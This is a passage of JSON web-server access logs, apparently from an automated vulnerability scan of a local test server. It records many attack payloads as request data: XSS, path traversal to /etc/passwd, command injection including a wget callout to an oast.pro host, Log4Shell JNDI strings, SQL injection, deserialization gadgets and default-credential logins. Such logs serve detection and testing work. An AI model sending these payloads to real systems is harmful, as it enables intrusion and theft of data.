HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/29N5Ej83YMZ0wbWiex3PTwMHZFD.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.ca2tuc8smpv1g2s80ca0efdoyw57wux93.oast.pro}"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /applications.pinpoint HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/29N5Ej83YMZ0wbWiex3PTwMHZFD.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0ArO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\x0D\x0AgetUnsavedChanges\x0D\x0ArO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAKmNhMnR1YzhzbXB2MWcyczgwY2EwYjRtNWo1emU1dGVmNS5vYXN0LnByb3QAAHEAfgAFdAAFaHR0cHNweHQAGWh0dHBzOi8vdGVzdC5qZXhib3NzLmluZm94\x0D\x0ArO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/ca2tuc8smpv1g2s80ca0wmmafk5zxdgm3.oast.pro/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"&uid=10; wget http://ca2tuc8smpv1g2s80ca0ac9cjtgifnwpd.oast.pro","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\x22)&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log 